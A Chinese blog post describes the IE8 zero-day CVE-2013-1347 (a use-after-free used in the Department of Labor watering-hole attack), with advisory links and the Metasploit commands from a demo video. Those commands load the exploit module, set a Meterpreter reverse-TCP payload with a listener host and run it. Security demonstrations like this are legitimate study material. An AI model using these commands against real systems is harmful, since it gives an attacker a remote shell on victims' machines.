2013年5月6日 星期一

IE 8 的 0-Day 漏洞 (含影片示範)

IE 8 的 0-Day 漏洞 (含影片示範)

發佈日期:2013/4/20(由 invincea 首次發現)、2013/5/3(發佈)
影響版本:Internet Explorer 8 (所有 Windows 版本)
漏洞編號:CVE-2013-1347

說明:
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that’s controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) web site.

官方網站說明:
http://technet.microsoft.com/en-us/security/advisory/2847140

其它參考網站說明:
http://www.invincea.com/2013/05/part-2-us-dept-labor-watering-hole-pushing-poison-ivy-via-ie8-zero-day/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347

Metasploit 的攻擊模組:
https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit

影片內指令:
use exploit/windows/browser/ie_cgenericelement_uaf
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit
getuid
sysinfo


參考資料來源:
http://eromang.zataz.com/2013/05/05/cve-2013-1347-microsoft-internet-explorer-8-vulnerability-metasploit-demo/

轉載自《網路攻防戰》

沒有留言:

張貼留言